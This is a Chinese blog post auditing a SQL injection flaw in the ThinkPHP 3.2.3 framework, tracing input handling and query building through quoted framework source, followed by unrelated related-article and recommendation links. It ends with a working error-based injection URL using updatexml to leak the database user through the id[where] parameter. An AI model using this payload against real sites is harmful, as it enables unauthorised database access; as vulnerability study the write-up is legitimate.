开始复现审计一下tp3和tp5的框架漏洞,当个练习吧。

涉及注入的方法为where() table() delete()等。

环境 tp3.2.3 :

0x01 注入成因

测试代码:

    public function index2(){

//        $data = M('user')-> where('username = "admin"')->select();

//        dump($data);

        $id = i('id');

        $res = M('user')->find($id);

I方法断点 跟进去看。

F7跟进, thinkphp/ThinkPHP/Common/functions.php :

从283行开始看 首先判断提交方式:

......

switch(strtolower($method)) {

        case 'get'     :

            $input =& $_GET;

            break;

        case 'post'    :

            $input =& $_POST;

            break;

        case 'put'     :

            if(is_null($_PUT)){

                parse_str(file_get_contents('php://input'), $_PUT);

            }

            $input     =    $_PUT;

            break;

        case 'param'   :

            switch($_SERVER['REQUEST_METHOD']) {

                case 'POST':

                    $input  =  $_POST;

                    break;

                case 'PUT':

                    if(is_null($_PUT)){

                        parse_str(file_get_contents('php://input'), $_PUT);

                    }

                    $input     =    $_PUT;

                    break;

                default:

                    $input  =  $_GET;

            }

            break;

        case 'path'    :

            $input  =   array();

            if(!empty($_SERVER['PATH_INFO'])){

                $depr   =   C('URL_PATHINFO_DEPR');

                $input  =   explode($depr,trim($_SERVER['PATH_INFO'],$depr));

            }

            break;

        case 'request' :

            $input =& $_REQUEST;

            break;

        case 'session' :

            $input =& $_SESSION;

            break;

        case 'cookie'  :

            $input =& $_COOKIE;

            break;

        case 'server'  :

            $input =& $_SERVER;

            break;

        case 'globals' :

            $input =& $GLOBALS;

            break;

        case 'data'    :

            $input =& $datas;

            break;

        default:

            return null;

    }

重点看过滤的地方

think_filter:

function think_filter(&$value){

// TODO 其他安全过滤

// 过滤查询特殊字符

if(preg_match('/^(EXP|NEQ|GT|EGT|LT|ELT|OR|XOR|LIKE|NOTLIKE|NOT BETWEEN|NOTBETWEEN|BETWEEN|NOTIN|NOT IN|IN)$/i',$value)){

    $value .= ' ';

}

}

这里基本就是成因了 黑名单过滤 但是有漏网之鱼 常见的updataxml()报错函数都没过滤。

跟到后面在函数 parseSet可以看到我们提交的字符串作为占位符:

protected function parseSet($data) {

        foreach ($data as $key=>$val){

            if(is_array($val) && 'exp' == $val[0]){

                $set[]  =   $this->parseKey($key).'='.$val[1];

            }elseif(is_null($val)){

                $set[]  =   $this->parseKey($key).'=NULL';

            }elseif(is_scalar($val)) {// 过滤非标量数据

                if(0===strpos($val,':') && in_array($val,array_keys($this->bind)) ){

                    $set[]  =   $this->parseKey($key).'='.$this->escapeString($val);

                }else{

                    $name   =   count($this->bind);

                    $set[]  =   $this->parseKey($key).'=:'.$name;

                    $this->bindParam($name,$val);

                }

            }

        }

        return ' SET '.implode(',',$set);

    }

_parseOptions方法:

if (is_array($options)) { //当$options为数组的时候与$this->options数组进行整合

            $options = array_merge($this->options, $options);

        }

        if (!isset($options['table'])) {//判断是否设置了table 没设置进这里

            // 自动获取表名

            $options['table'] = $this->getTableName();

            $fields           = $this->fields;

        } else {

            // 指定数据表 则重新获取字段列表 但不支持类型检测

            $fields = $this->getDbFields(); //设置了进这里

        }

        // 数据表别名

        if (!empty($options['alias'])) {//判断是否设置了数据表别名

            $options['table'] .= ' ' . $options['alias']; //注意这里,直接拼接了

        }

        // 记录操作的模型名称

        $options['model'] = $this->name;

        // 字段类型验证

        if (isset($options['where']) && is_array($options['where']) && !empty($fields) && !isset($options['join'])) { //让$optison['where']不为数组或没有设置不进这里

            // 对数组查询条件进行字段类型检查

           ......

        }

        // 查询过后清空sql表达式组装 避免影响下次查询

        $this->options = array();

        // 表达式过滤

        $this->_options_filter($options);

        return $options;
当我们传入的值不为数组,直接进行解析返回带进查询,没有任何过滤。

同时$options['where']也一样,看到parseWhere函数
$whereStr = '';

        if (is_string($where)) {

            // 直接使用字符串条件

            $whereStr = $where; //直接返回了,没有任何过滤

        } else {

            // 使用数组表达式

           ......

        }

0x02 复现利用

http://www.qing-tp3.com/index.php?m=Home&c=Index&a=index2&id[where]=1%20and%20updatexml(1,concat(0x7e,user(),0x7e),1)--

跟到最后的时候还是有点小绕 delet那些方法产生注入大同小异 回来再写 上班~

 

代码审计-thinkphp3.2.3框架漏洞sql注入的更多相关文章

  1. 五十:代码审计-PHP无框架项目SQL注入挖掘技巧

    代码审计教学计划: 审计项目漏洞Demo->审计思路->完整源码框架->验证并利用漏洞 代码审计教学内容: PHP,JAVA网站应用,引入框架类开发源码,相关审计工具及插件使用 代码 ...

  2. 【代码审计】大米CMS_V5.5.3 SQL注入漏洞分析

      0x00 环境准备 大米CMS官网:http://www.damicms.com 网站源码版本:大米CMS_V5.5.3试用版(更新时间:2017-04-15) 程序源码下载:http://www ...

  3. 【漏洞复现】CVE-2022–21661 WordPress核心框架WP_Query SQL注入漏洞原理分析与复现

    影响版本 wordpress < 5.8.3 分析 参考:https://blog.csdn.net/qq_46717339/article/details/122431779 在 5.8.3 ...

  4. ASP漏洞+SQL注入的入侵方法

    本文就是想对装上了防火墙的主机,进行入侵攻击的大概思路小结一下. 首先当然是用扫描器对这台服务器(以下简称主机A)进行常规的扫描,得到初步的信息.再用nmap -sS IP -P0 -p 139 ,透 ...

  5. Web常见安全漏洞-SQL注入

    SQL注入攻击(SQL Injection),简称注入攻击,是Web开发中最常见的一种安全漏洞. 可以用它来从数据库获取敏感信息,或者利用数据库的特性执行添加用户,导出文件等一系列恶意操作, 甚至有可 ...

  6. 了解web漏洞-sql注入

    1:为什么要学web漏洞? 作为一个运维人员,日常工作就是保障服务器和网站的业务正常运行,平时也需要对服务器的安全工作加固,说到防护攻击问题,那么久必须去了解攻击者是怎么对服务器发动的一个流程,这样才 ...

  7. 14-15.Yii2.0模型的创建/读取数据使用,框架防止sql注入

    目录 创建数据库 表article 配置 db.php 连接数据库 创建控制器 HomeController.php 创建models 创建数据库 表article 1.创建库表 CREATE TAB ...

  8. 常见Web安全漏洞--------sql注入

    SQL注入:利用现有应用程序,将(恶意)的SQL命令注入到后台数据库执行一些恶意的操作.在mybatis 中比较容易出现:${} 会发生sql 注入问题 #{}: 解析为一个 JDBC 预编译语句(p ...

  9. 基础Web漏洞-SQL注入入门(手工注入篇)

    一.什么是SQL注入  SQL是操作数据库数据的结构化查询语言,网页的应用数据和后台数据库中的数据进行交互时会采用SQL.而SQL注入是将Web页面的原URL.表单域或数据包输入的参数,修改拼接成SQ ...

随机推荐

  1. 装系统 ------ 使用微PE 做系统盘

    1.什么是PE系统 pe系统是一种装系统的系统,也就是预装系统的系统,它是一种系统预装环境和工具. 可以放在U盘或光盘里随身携带,可以用来给电脑装系统 2.常见的制作pe 系统的工具 大白菜,U启动, ...

  2. 即时聊天APP(三) - 注册和登陆

    注册和登陆大多都是一些用户名和密码的验证,所以放在一起写,注册代码: String account = accountEdit.getText().toString().trim(); String ...

  3. Asp.net Windows 身份验证-域验证

    一.在web.config中设置: <authentication mode="Windows" /> 二.获取计算机名\账户名 使用代码:HttpContext.Cu ...

  4. Vue学习之todolist功能开发

    <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8&quo ...

  5. JavaScript之对象基础

    现实世界是由无数的事物或对象组成,事物都有各独特的属性和一些动作行为,一般我们可以通过事物的某些特征或行为动作描述它.JavaScript中也是如此,JavaScript对象是多个键值对的集合,键我们 ...

  6. Java匹马行天下之C国程序员的秃头原因

    Java帝国的崛起 前言: 分享技术之前先请允许我分享一下黄永玉老先生说过的话:“明确的爱,直接的厌恶,真诚的喜欢.站在太阳下的坦荡,大声无愧地称赞自己.” <编程常识知多少> <走 ...

  7. Maven 创建项目之简单示例

    maven 是一个项目管理工具.可以用来管理jar包依赖,构建项目等. 那么接下来,就在eclipse中使用maven创建一个简单的项目. 1,依次点击File-> New -> Othe ...

  8. JAVASE知识点总结(二)

    第十三章:多态  一.instanceof 判断一个类是否是指定的类 真则返回true 假则返回false.  二.字段没有多态,只有方法有多态,字段前面是的什么类型,字段就调用谁的,在编译时就已经确 ...

  9. Spring boot 梳理 - 在bean中使用命令行参数-自动装配ApplicationArguments

    If you need to access the application arguments that were passed to SpringApplication.run(…​), you c ...

  10. mybatis collection和association使用区别

    1. association-关联,用于一对一(如人与身份证)和多对一(如班级和学生) 2. collection-集合,用于一对多(如学生和班级)的关系